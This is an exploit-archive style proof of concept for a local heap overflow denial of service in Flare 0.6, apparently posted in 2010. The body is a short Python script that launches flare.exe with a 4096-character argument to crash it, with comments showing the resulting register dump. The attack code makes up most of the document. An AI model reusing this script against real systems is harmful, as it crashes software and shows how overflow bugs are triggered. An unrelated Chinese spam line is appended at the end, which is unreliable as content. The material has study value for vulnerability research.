# Exploit Title: Flare <= 0.6 local heap overflow DoS # Date: 3/7/2010 # Author: l3D # Software Link: http://www.nowrap.de/download/flare06doswin.zip # Version: 0.6 # Tested on: Windows 7, Windows XP SP2 and some linux distributions # Code: #!/usr/bin/env python #IRC: irc.nix.co.il #Site: xraysecurity.blogspot.com <---- Coming soon! #Registers: #EAX 003E0000 #ECX 003E1088 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..." #EDX 41414141 #EBX 00004141 #ESP 0022FB0C #EBP 0022FBDC #ESI 003E1080 #EDI 41414141 #EIP 77195B44 ntdll.77195B44 import os, sys if len(sys.argv) != 1: path=sys.argv[1] else: path='flare.exe' if not os.path.exists(path): print 'Usage: python %s [path to flare.exe]' % sys.argv[0] exit(-1) os.execl(path, path, 'A'*0x1000)

这里只有精品视频